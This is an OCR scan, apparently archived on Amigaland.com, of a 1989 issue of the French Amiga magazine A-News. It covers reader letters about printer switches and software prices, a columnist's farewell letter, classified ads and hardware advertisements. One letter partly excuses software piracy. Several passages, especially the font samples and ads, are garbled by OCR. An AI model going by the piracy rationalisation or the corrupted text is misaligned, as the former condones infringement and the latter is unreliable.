LMo obligatoire Tank: Animation de "fishtank simulator" A-News, courrier courrier courrier Je vous félicite pour votre superbe revue, mais qui malheureusement perd une robri- que très utile et donc je crois, beaucoup de lecteurs vont être déçu. Adieu adorée ¦Newsletter".
Stéphane Francon, 95 Mafiliers Salut à tous (à quand le salut à toutes?!)
..Mes regrets les plus sincères pour le départ de Cupertino. Vraiment rien ne peut changer son avis?
Voici mon réabonnement jusqu'à l'éternité... Jérôme Venant. 93 Aulnay-sous-Bois (Ed: Les toutes c'est touie-de-suitc. Nous avons une secrétaire un jour par semaine, et ça fait déjà un an que notre femme corrige nos photts. Dites-leur donc bonjour.
Anecdote : le mois dernier les Coincés, Tropic, Yeli, et Thierry R ont visité nos bureaux juste au moment ou nous étions en train d'envoyer les abonnements. Ils ont trouve le journal destiné à l'une de. Nos deux ou trois abonnées féminines, et y'ont apposé leur signatures et moulus messages avec bisous etc. Deux semaines plus tard nous avons reçu la lettre suivante : "Cher A-News, le voulais t'informer que je suis un garçon (sic). En effet, je suis abonné et lorsque je reçois A-News il y a écrit "Stéphanie" dans l'adresse. Alors j'ai été très content d’être salué par toute l'équipe en
recevant mon A-News d'Avril, mais j'aurais préféré quelque chose de plus viril que des 'bisous'.
C'était sympa et s'il y ad autres filles qui sont abonnées, vous pouvez toujours m'envoyer leurs adresses.. Stéphane W. Amiga-ImageWriter II - Attention Suite à une communication de Roger Pannérec. Notez qu'il ne faut pas toucher au swilches 5 et 6 de SW2 de l'imprimante Imagcwritcr, même s’ils ne concordent pas avec le dessin sur la page 10 d'A-News N'11. Les différentes séries de cette imprimante peuvent varier. Un avertissement dans le manuel de l'imprimante déclare qu’il ne faut absolument pas changer les positions de ces deux switchcs, qui sont d'ailleurs étetés.
Ils servent à la configuration au niveau logique de l'électronique, et leur déplacement provoque des "perturbations irréversibles" - dans le cas de M. Pannercc la carte de l'imprimante a souffert et la 9èmc aiguille ne marchait plus. Coût de la réparation : 1000F.
Nous voudrions insister sur le fait que nos montages sont testés dans la mésurc du possible par leurs auteurs, c’est à dire dans des situations assez limitées. La seule garantie que nous offrons est de communiquer les éventuels commentaires de ceux qui s’en servent.
Autre problème d'imprimante : un lecteur n'a pas pu faire marcher son I.ascrwritcr en utilisant nôtre câble à trois fils (A-News 12 page 4). A la fin d'une longue et frustrante journée il s’est rendu compte que ce n'était pas la faute du câble, mais du mauvais positionnement des switchcs sur le laserwriter. II avait bien essayé de changer ces switches, mais sans jamais éteindre le LaserWriter, qui n’avait donc pas enregistré la nouvelle configuration.
A toute l'équipe d'A-News, Je suis tout-à-fait d'accord avec Thierry R en ce qui concerne la perte réelle de logiciels futures du fait du hop grand piratage sur Amiga, conséquence de trop nombreux pirates "expérimentés", mais je dis aussi qu'il ne faudrait pas toujours les passer par les armes dès que la meute "officielle" lancée à leurs trousses en déniche quelques-uns.
En effet, c’est sans aucun doute grâce à eux que tout le monde (ou presque) arrive à connaître la vaste logithèque de l'Amiga. Si nous devions à chaque fois banquer 200 300F (voire plus) pour s’éclater sur le dernier presse-bouton hyperdémentiel, j'en connais (dont moi) qui ne s’éclateraient qu’au rythme d' 1 ou 2 jeux (ou autres) par an.
Car quoi qu'en disent certains, un tel prix n’est pas concevable pour un logiciel reservé à un tel usage. Je ne parle pas des logiciels très spécialisés qui valent réellement leur pesant de brouzoufs, mais même dans ce cas, comment un particulier peut-il espérer voir tourner la dernière des merveilles sans devoir prendre un crédit 12 mois ou s'inscrire aux RestoDukeur?
Oui bon, y'faut bien récompenser les géniaux concepteurs (tout à fait d'accord), mais quel est leur pourcentage sur le prix final? 5%, 10%? Tous les revendeurs se sucrant largement au passage, bien au-delà de leurs soi-disant frais de distribution (disk+manucl+pub), on atteint facilement des sommes (g)astronomiques!
Quand on parle de sucrer les fraises, je sais de quoi je parle. A mes début, je bossais sur DAI et je m'éclatais comme une bctc dessus (d'ailleurs je m’en sers toujours aujourd'hui, connecté au ’Miga). J'avais développé quelques programmes que j’avais tenté de distribuer. Malgré le bas prix pratiqué (environ 100F à l'époque sur cassette), je n'avais pas touché grand chose (avant d’être victime des pirates) car nous étions assez peu nombreux (à tort) pour partager les fantastiques capacités de notre chère bécane. Aujourd’hui un copain bossant sur l’Hcslel (oh l’infâme) m’a tuyauté sur ce
qu'il touche sur un programme qu’il a écrit.
à combien sa boîte le vend et à combien les revendeurs le distribuent : si on part de 1F, le résultat final atteint largement les 7J8F.
C’est une HONTE pour les programmeurs ainsi escroqués! Non seulement ils touchent juste de quoi s'acheter le journal du Top 50 mais à un tel prix, la diffusion de leur "bébé" est réellement freinée, et ce n’est pas encore la faute du pirate!!
Après seulement, quand l'acheteur potentiel compare les prix et le montant de sa solde, il préfère se tourner vers le copain d'un copain qui lui procurera tout ce qu'il veut pour le prix de disks vierges... et il aura (presque) raison. Je dis presque car pendant qu’il y est, il les refilera à un autre copain et la chaîne continue... STOP!
Ace stade intervient l'autocritique de l’Amigaïste : soit il est véreux jusqu'à l’os et ne pense qu'à son propre plaisir, soit il a pitié des programmeurs lésés et achète quand même 1 logiciel de temps en temps.
En cc moment, je tends plutôt vers la deuxième alternative; je suis tombé si amoureux fou de Marble Madness que je l'ai acheté, et je vais sans doute bientôt faire de même avec Katakis et Deluxe Music (entre parenthèses, j’ai enfin fini Katakis... EN FIN un presse-bouton génial qui, avec Star Ray et Marble Madness, a su me résister pendant longtemps). Je n’ai pas honte de m'être adressé à des copains de copains pour me procurer de quoi égayer mes longues soirées d’hiver, car je ne suis pas Crésus.. mais, selon l’expression consacrée, "cclà m’interpelle quelque part” de m'éclater sur des
softs archi-géniaux sans en récompenser les auteurs d'une manière ou d’une autre: je pense qu’eux non plus ne sont pas Crésus et que s'ils ont choisi l’informatique et l’Amiga pour gagner leur croûte, il faut qu'ils restent persuadés d'avoir fait LE bon choix.
Alors, fanatiques d'Amiga, faites comme moi...utilisez modérément Woolitc pour blanchir vos dealers en softs mais, de temps en temps, pensez humblement à ceux grâce à qui l'Amiga est ce qu’il est : une bécane splendide qui a BESOIN des talents de tous pour tenir la route. Qu'on se le dise!
Boubax, the Hestet Buster LE COIN DES PROBLEMES "Pour le coin des problèmes, il suffit d'acheter un Amiga 500, il n'y a pas de ventilateur." (Gwénacl Ropcrt).
"Echanger 1’ A2000 contre une A500.
Augmenter le volume de la chaine hi-fi" (Alain Bourgery).
En fait, nous avons reçu des communications très intéressants sur cc sujet de messieurs Duchatelle, Chisloni et Beuchot. Reportage le mois prochain.
Messieurs.
Courner courrier courrier Je voudrais apporter de l’eau au moulin de Jacques Risso (courrier du N’11). En utilisant Textcraft Plus en dfü: et ma disquette de fichiers en dfl:, j'ai également eu l’erreur "Volume X is not Validatcd", après avoir sauvegardé un texte plus volumineux que l'espace restant sur la disquette en dfl:. Pour rendre cette disquette à nouveau utilisable je l'ai passée au DISKDOCTOR qui a détruit le dentier fichier sauvegardé et quelques '.info'. J’avoue ne pas savoir d’où vient le problème : disquette (Fuji MF2DD), programme (ne passant pas par la routine testant la
capacité disque), lecteur (déréglé), ou bug dans les ROM.
Malgré cela je trouve que l'Amiga est une bonne machine, peut-être un peu difficile à prendre en main, et certainement très difficile à exploiter totalement! J'espère que voire journal nous y aidera.
Alain Legrand, 59 Maubeugc.
A A-News et à tous les AMIGAs, Vous avez pu remarquer que Aegis Draw + nous propose des ''fournitures'' issues du fichier .draw du même nom. Ou que Deluxe Paint Art nous propose quelques arbres ou dinosaures dans une fenêtre. Il serait intéressant de pouvoir récupérer ces figurines et les passer à la fenêtre dans laquelle on dessine.
Seulement la solution consistant à faire un save brush dans une fenêtre et un load brush dans l'autre pour revenir dans la première et faire un delete brush qui n’existe pas la plupart du temps, n'est pas des plus satisfaisante et à ce propos j’insiste lourdement sur le fait qu’il est de votre devoir de pousser tous vos lecteurs à boy coter sévèrement tous les logiciels qui ne seraient pas gérés correctement sous Intuition. Il est impératif de pouvoir au moins retourner au Workbench sans faire un reset parce qu'il n’y avait plus assez de place sur la disquette pour sauvegarder les deux
ou trois heures de travail que l’on venait d’effectuer, et que le logiciel ne permettait pas d’effectuer un formatage.
(Ed. Dans presque tous Us cas on peut retourner au Workbench en appuyant simultanément sur la touche Commodore (ou Amiga) de gauche et N. Pour revenir, la même chose mais avec Commodore et virgule si vous êtes en clavier Azerty (qui équivaut à Commodore et M sur clavier Qwerly).
J'aimerais aussi vider mon sac sur un point qui nous touche tous et que vous avez timidement évoqué dans votre numéro de Janvier-Février. Il s'agit du Workbench 1.3. J entends déjà les cris de soulagement des lecteurs. On a tous pu se procurer la disquette, mais quand il s'agit de l'utiliser, même pas un petit Readme sur la disquette.
Les plus grands distributeurs ne connaissent pas l'existence d’une doc, ne serait-ce en Anglais.
PS On nous vante de nombreux pilotages automobiles. Pitié, arrêtez tout. Entre Test Drive qui nous donne plus l'impression de piloter les murs que la voiture, et Ferrari Kl qui tourne tellement la tête que l’on se demande si l’on à pas été éjecté de la voilure au troisième virage, je vous demande ce que font les éditeurs de REVS sur C64 avec pilotage par paddlc, ridicule potentiomètre sur lequel on fixe un disque ressemblant plus ou moins à un volant, et permettant de simuler une conduite digne de la "super console de jeux".
PPS Existe-t-il sincèrement un traitement de texte au moins équivalent à Virgule 64, capable d’insérer des caractères semi- graphiques ou exposants indices dans une page qualité courrier, et ne mettant pas le souk sur le clavier lorsque l'on actionne caps lock. Comme le fait Textcraft Plus?
Aluin Bonnefoy, 26000 Valence Ed. Nous sommes tout-à-fait d'accord pour le doc de Workbench 13. Le pire c'est que la doc existe en français, mais pour t'avoir il faut acheter un A500 tout neufI Allez Commodore, c'est urgent, qu'est-ce que vous attendez?
Textcraft Plus fait ça?
Cher A-ml-gaiste, J'aimerais connaître, si elle existe, la liste de votre logilheque Françisée, avant de me servir du 36-15. Il est regrettable que nombre d’informaticiens Français ne se penchent pas sur la traduction des programmes Américains. Avec un basic C-64. La solution était plus facile qu'avec un programme de la nouvelle génération Commodore et il n'est pas toujours aisé d’en sortir.
Georges Coiffe, 83 Besse sur Issolc Ed: Nous avons reçu des nouvelles d'un groupe dans ta région de Valcnciennes qui a l'intention de traduire des logiciels DP. Si cela se concrétisé A-News se fera un plaisir transmettre les informations. En attendant, les DP sont presque tous en Anglais.
Cher A-News, Si je me réabonné, vous savez ce que je pense d'A-Ncws. Quelques suggestions toutefois :
* Moins de critiques de jeux, il y a assez de revues pour ça.
Pourquoi ne pas les remplacer par des critiques de DP?
* Ne limitez pas Cuperlino! C'est l'âme-iga.
* Pas mal votre DEEP. A développer...
* Question - comment expliquez les prix RFA et les prix F. J'ai
acheté un 31MB, 28ms, totalement FFS pour 900DM, soit 3100F
(pour A500). Mon A500 + moniteur 1084 stéréo I300DM. Soit
4500F, alors? Les vendeurs Français nous prennent pour des
idiots?
Encore bravo!
Pascal Schalck, 67 Strasbourg Ed: Nous allons bientôt exposer les deux côtés de ce sujet.
Cher A-News, Je vous lis toujours avec autant de plaisir depuis le premier numéro. Gardez tout, même les fautes de Giorgio Cupcrtino, et surtout votre style et votre humour. J'ai un Amiga 500 depuis un mois et j’en suis enchanté. Bravo et longue vie.
Existe-t-il des badges Commodore?
Jean-Louis Potier, 28 Luisant Ed: Demandez à votre revendeur Commodore ; il existe depuis peu des sacs sport, des joggings, des sweat-shirts, des tee-shirts, des cravates, des parapluies, des calculettes, des bloc-notes, des stylos-bille, des stylos-feutre, des briquets et des autocollants Commodore, mais pas des badges.
Désolé.
Bonjour, Je souhaiterais personnellement faire suite à l'article de Thierry R. Sot initiative de faire appel aux pirates m'as parue une démarche enfin digne d’intérêt. Mais il ne faut pas oublier qu’à une grande échelle, les petits pirateurs ne copient que par manque de moyens financiers, et que ce sont eux qui entraînent à pirater les swappers ou autres hackers. Une autre solution pourrait donc se conjuguer à l'appel de Thierry, celle de faire baisser le prix des logiciels, excessif sur Amiga (pour Dragon’s Lair, par exemple, près de 600F pour un logiciel qui est plus une démo qu’un jeu).
En tous cas, il faudrait que les grands pirates, à la base de la distribution, comprennent que c’est forcément dans leur intérêt, et qu’au delà des compétitions entre groupes, ils ne fassent pas mourir trop vite une aussi belle machine que Tamiga.
Luc Chemin, 93 Noisy-lc-Scc Cher A-News, Une petite info pour les possesseurs de LX-800 et WB 1.3. Le driver d'imprimante EpsonX n'est pas mal, mais il y a encore mieux : EpsonX(MPS_1250). En effet, avec Prowritc ou avec le Workbench lui même, en densité 7 avec l’option SMOOTHING sur ON, on obtient un résultat très sympathique, qui rappelle, avec certains jeux de caractères, l'impression d'une marque qui fait des machines à base de souris 68000 hors de prix!!.
Ca fonctionne aussi très bien (et en couleur s’il vous plait), avec la MPS-1500C Commodore (aussi appelée Olivetti DM 105 si je ne m'abuse).
Une question simple : de temps en temps mon AG500 se réveillé en NTSC et refuse obstinément de passer en PAL...Un simple Warmstart a toujours suffi à résoudre le problème, mais ne m’en a pas donné la cause.. Une idée?
Cédric Nerot, 06 Nice Ed: Ce n’est qu' un petit BUG qui habite le ROM. Commodore l'admet. Enjoy!
Giorgio Cupertino Monte-Carlo, le 17 Avril 1989 Mes Cher(e)s Amigàdos, Je remercie infiniment Bruce Lepper de bien vouloir accueillir dans A-news cette "lettre ouverte" adressée à l'intention de mes lectrices et lecteurs.
Le fait d’avoir annoncé ma décision d'arrêter ma Newsletter (ainsi que mon support direct à 1'Amiga) a provoqué un "déluge" de lettres; la quantité est telle (une vraie avalanche) que j'en ai perdu le compte; au moment où j'écris, je ne suis même pas arrivé à les ouvrir toutes. Dans ces conditions il est évident que, même si j'essaie de répondre individuellement à chacun(e) cela pourra prendre plusieurs semaines; voire des mois. Vu les circonstances, je profite bien volontiers des pages de A-news pour répondre aux questions les plus couramment posées et donner ainsi satisfaction à la plupart
de ceux qui m'ont écrit. Voilà donc en vrac mes réponses... Avant tout je vous confirme qu'avec A-news, je n'ai pas eu le moindre problème et ou conflit. Bien au contraire, Bruce Lepper et Rod Craig m'ont toujours soutenu même au delà du raisonnable et même si cela leur a coûté une bonne dose de "bâtons dans les roues" en plusieurs occasions.
Deuxième point très important: je n'ai pas quitté 1'Amiga pour NeXT. Il est vrai que je m'intéresse très activement à NeXT (je ne l'ai jamais caché d'ailleurs), mais il est aussi vrai que j'avais écrit que j'espérais pouvoir vous dire "... ce qu'il sera possible de faire avec un Amiga et NeXT reliés ensemble." (cfr. A-news 8, CAN 18, page 8). Si je n'avais pas été démotivé, j'aurais bien pu continuer à suivre les deux machines en même temps. (D'ailleurs j'ai plus que dix ordinateurs chez moi, toutes marques confondues, et cela ne m'a jamais empêché de manifester ma passion pour l'Amiga.)
Je ne quitte pas A-news pour Icônes: j'écrivais pour Icônes bien avant la sortie d'A-news. Si je continue à écrire pour Icônes, c'est que je trouve cette revue un support "logique" pour NeXT en général et pour la review de produits professionnels pour Amiga; pour ces derniers, j'écrirai des articles "ciblés" à caractère informatif (voire comparatif) et, donc, pas en tant que soutien à la machine, tel qu'ils pourraient l'être dans une revue "dédiée" telle que A-news. (Cela, donc, en parfaite cohérence avec ma décision.)
Ma décision est-elle définitive? Tel que je l'ai déjà dit, j'ai décidé d'arrêter mon support à l'Amiga car je suis démotivé. Je tiens à préciser que, démotivé encore plus que ce que je l'étais quand j'ai écrit ma "final issue" (CAN 22 du 17 février 89), je n'écrirai plus un seul article sur Amiga ni dans A-news, ni ailleurs; (Icônes restant la seule exception pour les raisons déjà expliquées). Oui ma décision est définitive. (Même si je ne quitterai pas l'Amiga en tant que "hobby personnel".)
En ce qui concerne le service Domaine Public, je confirme ce que j'ai écrit: ceux qui sont sur ma mailing-list recevront une liste de nouveautés (entre Juillet et . Septembre) et dans cette occasion-là je dirai si je vais continuer le service PDS ou si j,'arrête.
A plus forte raison, ma "Hot-Line" est terminée. Fini le support technique. Je continue à donner l'assistance seulement pour des problèmes liés aux disquettes PDS et seulement à ceux qui les ont achetées chez moi. Merci de comprendre mes raisons... Non, je ne suis lié à aucun groupe! Clubs, Associations, Serveurs et autres qui "profitent" de "mon style" sont des imitateurs qui, à leur façon, me rendent hommage (l'émulation est la forme d'appréciation la plus sincère) mais je ne suis pas en rapport avec eux. Donc, qu'il s'agisse de "with bla bla you CAN", des serveurs (BAL) signé(e)s ALOHA, ou
de formules AMIGAles et AUTREment vôtre, sachez que dans aucun cas personne ne peut vanter un lien avec moi ou un soutien de ma part. Cela pour éviter toutes confusions ou doutes possibles... Ce que je viens d'écrire devrait répondre à 95% des questions que vous m'avez posées avec des centaines de lettres; néanmoins, les lecteurs qui m'ont posé de questions différentes recevront une réponse personnelle dès que possible.
Même si je vous quitte, je vous en prie, encore une fois et tou(te)s ensembles, AmiGamines et AmigaFans, criez avec moi: "VIVA Amiga!".
AMIGAlement Vôtre,
- Giorgio Cupertino -
P. S. Le Concours ABC est terminé. La liste des gagnants sera
publiée dans le prochain numéro de A- news. Tous les
participants, ainsi que les "sponsors", recevront (le mois de
juin prochain) une disquette avec tous les programmes qui ont
été soumis au concours.
A-News MATERIEL A VENDRE LECTEUR DE DISQUETTES DF1 3’ AMSTRAD alimentation incorporée, avec câble CENTRONICS : 850F ou échange contre extension A-50I. ENCYCLOPEDIE BASIC PLUS en 6 volumes 500F.
LETOURNEAU SARCELLES 95200 tél 16- 39-93-45-19.
VENDS cause 2000 AMIGA 500 + moniteur couleur A1080 5500F; extension mémoire interne A50I 1000F; extension mémoire interne IN500 Spirit de 1.5 mega 4400F; extension mémoire externe Micron de 2 méga 5COOF; tablette graphique Easyl A4 3500F; lecteur externe 3'' 1000F. Le tout 20000F. Contacter Eric
(1) 42-40-59-48. Le soir entre 18h30ct20h30.
A-NEWS en SUISSE Si vous êtes en Suisse vous pouvez vous abonnez à A-News pour 12 numéros pourla somme de 54FS. Envoyez votre paiment à : A-News, Conconi P, 36 Av Luserna, 1203 Génève.
CCPNo 12-25868-1 Vous pouvez commencer votre abonnement à partir de n’importe quel numéro, le No 1 compris.
Les anciens numéros sont disponibles au prix de couverture chez: 33 C1S 571 571 ers de la Libération, Talence 62 Infograph 1 r du 11 novembre, Lens 64 Bab Micro, 7 me de Coursic 64100 Bayonne 69 Cîelain Ets 22 Ave de Saxe. Lyon 75 Infomanie 3 r Perrault 75001 Pans 98 Gloria 7 r de Millo, Monte-Carlo, Monaco Belgique Media 1-em.nie François Dorrcc 93,7360 Boussu Suisse Octopus Computer SARL, rue du Bassin 8. 2C00 Neuchatcl Access, ru* Centrale 66a, 2503 Biel-Bienne Edu Soft 14-16 r des Gares 12011 Genève 2 IRCO 3 rue Jean Violette. 1211 Genève 4 ETUDIANT ACHETERAIS AMIGA à bas prix. Cherche
emulateurs Bruno THIEBOT, 44 rue Adrien Gircttcs, 50 110 TOURLAVIU.F.. I ci 33-22-40-71, après 19h VENDS GENLOCK GST 30P (encodeur intégré) ss garantie (7 mois) 3000F; disque dur 20 Mo A2090 ss garantie 2 ans 5200F. Tél 64- 07-19-76 (le weekend uniquement), demander Thierry.
VENDS DIGITALISEUR AUDIO (stéréo) pour Amiga 500 1CO0 20CO. 490F. Demander Philippe au 45-25-55-73.
VENDS AMIGA 500 4 Extension Mémoire 512ko 4 lecteur externe A1010 + logiciels, le tout état neuf sous garantie. 6000F.
Tel 43-79-99-41. Demander Patrick.
CAUSE PASSAGE A2000, sacrifie A500 cxc ctat sous garantie pendant encore 7 mois + ext RAM A501, le tout à 5000F (avec quelques disks en prime). Demander Pascal en semaine au 78-42-27-48 (après 20h) ou le week- end au 79-25-67-14.
URGENT VDS AMIGA 2000 v 1.3 + moniteur 1084S 4 lecteur externe 3.5 4 docs ?softs = 136COF; tablette EASYL 2000.
4000F, ou le tout 17000F. Ic tout garantie, sauf lecteur externe. Tel 60-17-49-78 de 17h à I9h30 seulement.
VDS AMIGA 2000 étal neuf+monitcur IIR+disquc dur 20 méga+2eme lecteur+nb logiciels le tout 18000F à débattre. Tél 44-49-08-70. Demander Janick.
VDS AMIGA 1000 PAL Azcrty MEM 2.5 MO + moniteur A1081 + lecteur exieme A1010 t digitaliseur DICIVIEW 4 câbles + joystick 4 très nombreux log., docs, livres.
Cédé 13500F (valeur 4 25000F). Etat neuf, emballage origine. ERIC 16-1-46-26-14-23.
VENDS LECTEUR 3,5 A1010 avec programmes le tout à 1000F. Vends, échangé et acheté programmes. Cherche Conrplagepi.
Contacter. : Wermelinger Serge, 34 rue de Dunkcrque, 68200 Mulhouse. Tél 89-53-75-
43.
ACHETE EXTENSION MEMOIRE pour A1000 et drive 3,5 sup. Cherche contactes sérieux au Mans tous domaines Amiga. Demandez Eric au 43-81-40-57 (province).
VENDS LECTEUR 5P, I300F, extension 512ko, 1000F, neuf. Té! 88-84-92-17 après 18h.
CONTACTS A5004DF14A501 cherche GFA- BasicMcn pour échange d’idées, de trucs, de routines, ûwénuél ROPERT, 24 rue de Tourainc, 56300 Pontivy. Tel 97-25-34-16.
AMIGA L1MOGEAUD esseulé cherche Amiga Lcmougcaud pour progrès en language Assembleur et C. Tél 55-01-5(177 de 18 à 19h CHERCHE CONTACTS, je possède un Amiga 500 sur région Poilou-Charentes, trucs divers, hards et softs. Francis GAUD, 246 av de Paris, 79000 Niort Tél 49-24-70-39.
FAN D’AMIGA échange ou vends disquettes du domaine public (FISH, démos..) Écrire à Bernard, 20 rue Cail, 75010 Paris.
Vous qui possédez un AMIGA et qui de plus aimez les superbes démos animées, sonores, slide-shows, datas pour Sonix cl utilitaires, profitez de notre service de distribution de disks du domaine public. Notre catalogue est disponible sur simple demande.
Adresse ; FD, BP 18. 59115 LE ERS. Merci de joindre un timbre.
Recherche graphistes.programmcurs (680CO) et musiciens sur Amiga. Recherche conlacts français cl étrangers. Réponse à toutes lettres. Contactez-moi : PROVILLE, Dominique, 130 rue Jean Jaurès, 62160 Bully- les-Mines.
RECHERCHE CONTACTS AMIGAles et durables sur toute la France pour échange en tout genre. Sur Amiga. FRANCON Stéphane, 20 rue du Père Goriot. 95560 Mafllicrs.
CHERCHE CONTACTS serieux pour échanges tous genres sur Amiga 500. Thicrry- Laurent, 24 rue Philibert Caux. 76420 Bihorel- les-Rouen.
Echange nombreux logiciels sur Amiga VENDS tuner Scott 800F, platine disque Pho- nia 800F. LETOURNUL Alexis. 17 Allée des Heurs, 76240 Bonsecours. Tél 35-80437-26.
DYNAMIC BOY échange logiciels, démos. Utils....dans une ambiance sympa et sérieuse. Castcllvi Denis. Lotissement Sic Madeleine, 13300 SALON.
CLUBS (rubrique gratuite) 18 BOX ON EN CORPORATION - Club pour Amea ST. Charles DckouU. 16 Allie Henri SaUi.
18000 Bourges. TH 48-24-53-64 Mr. 49 CLUB AMIGA ANGERS: Pot, iota renseigner*: Alhgand Denis. 65 rue du Bon Repas.
49000 Angers. TU 41-44-21*51 57 ALPHA CLUB INFORMATIQUE SARRECUEM NES Foyer Cuüurel. 3 rue JxdM. 5720 SARREGUEMINES. TU87-95-25 03.
64 MICROINFORMATIQUE CLUB D'ANGŒT TéL59-52-34-03.
70 AMIGA FUN CLUB: NewtUtw, contacts, domaine publie. Re miche Laurent. Rue du Coteau, Errevet. 70400 HtricowS.
93 FURJO Amig+utert, Luc CHEMIN. 178 rue de Pans. 93130 NcNy-te-See A-New s Ceci est Helvetica .
Ceci est LtrGoth rej fffijL, - Ceci est UnivDmr$ i1Æ»V Ceci est Tyme Ceci est Colombie Ceci ait iaturn .$ |W' Ceci est TcmHip ** ceci 6ST ARTISTlC gf ' Çeei «St Orienta Ced est Hetvetica12pt Ceci est LtrGolh 12pl Ceci e»t UnivDmn 12pt ?r'* Ceci est Tyme 12pt - Ceci est Colombia 12pt Cad ayfc batum to* Ceci est TcnkMuff 12pt CC«I CST AKTIfiTIC w iy jt ïjjmsjsj Ç««l est Orientât 12pt Voici une façon révolutionnaire de traiter vos textes grâce à Pagestream (nouveau nom de Publishing Partner Professionat), logiciel de mise en page qui est vendu en France par Upgrade Editions (tél (1)
43-44-78-88). On attrape une boîte de texte, on l’agrandi, on la fait basculer dans n’importe quel sens, et on l’imprime avec une très ancienne imprimante matricielle à 9 aiguilles DMP2000 d’Amstrad. Le résultat est étonnant, non?
Pho* « tertrique* non oonmauetta.
71 pute»» loc. • Graat CARTES DISQUE DUR SCSI HAUTES PERFORMANCES POUR AMIGA® 2000 Grâce à une conception très évoluée alliant la norme SCSI aux techniques de transfert DMA, les cartes disques dur GVP garantissent lo meilleure fiabilité et la plus grande rapidité pour le stockage de vos données.
Intégrant un contrôleur SCSI et un disque dur 3"1 2 sur une seule carte, les HardCards GVP s'installent aisément dans un seul port d'extension de l’Amiga 2000. Sans occuper l'emplacement du 2nd lecteur.
Le logiciel d'initialisation permet le partitionnement automatique ou personnalisé du disque dur; quelle que soit la capacité du disque, les paramètres AmigaDOS sont adaptés en conséquence.
Logiciel et manuel d'installation en français.
Les produits GVP sont dstribuès en France par : CIS 571, cours de la Libération 33400 Talence Tel.: 56 374 378 Fax: 55 040 895 Liste des revendeurs sur simple demande.
Amiga. Madfrtoah, *t Irrpact tort 6m marqua* topo*àa* *• Con Valay Produc * Ire rwpedMmant .im1 CRAZY ¦wl CARS V Se .eeïiiï. ”55 W ___.
Iri W ; f|re n S 2 1 ggg '-a TITAH » g* ¦¦ inÉËÉKÉÊ -ur % r W±Éïi «1 m ~ GAI.ACTK 28 TER AVENUE DE VERSAILLES - 93220 GAGNY - TEL. : (1) 43.32.10.92

Click image to download PDF

Merci pour votre aide à l'agrandissement d'Amigaland.com !


Thanks for you help to extend Amigaland.com !
frdanlenfideelhuitjanoplptroruessvtr

Connexion

Pub+

35.8% 
16% 
6.7% 
4.8% 
4.2% 
3.5% 
3% 
2.6% 
1.5% 
1.3% 

Today: 87
Yesterday: 94
This Week: 373
Last Week: 630
This Month: 2349
Last Month: 3072
Total: 66489

Information cookies

Cookies are short reports that are sent and stored on the hard drive of the user's computer through your browser when it connects to a web. Cookies can be used to collect and store user data while connected to provide you the requested services and sometimes tend not to keep. Cookies can be themselves or others.

There are several types of cookies:

  • Technical cookies that facilitate user navigation and use of the various options or services offered by the web as identify the session, allow access to certain areas, facilitate orders, purchases, filling out forms, registration, security, facilitating functionalities (videos, social networks, etc..).
  • Customization cookies that allow users to access services according to their preferences (language, browser, configuration, etc..).
  • Analytical cookies which allow anonymous analysis of the behavior of web users and allow to measure user activity and develop navigation profiles in order to improve the websites.

So when you access our website, in compliance with Article 22 of Law 34/2002 of the Information Society Services, in the analytical cookies treatment, we have requested your consent to their use. All of this is to improve our services. We use Google Analytics to collect anonymous statistical information such as the number of visitors to our site. Cookies added by Google Analytics are governed by the privacy policies of Google Analytics. If you want you can disable cookies from Google Analytics.

However, please note that you can enable or disable cookies by following the instructions of your browser.

Visitors

Visite depuis
03-10-2004
Visite depuis
23-02-2014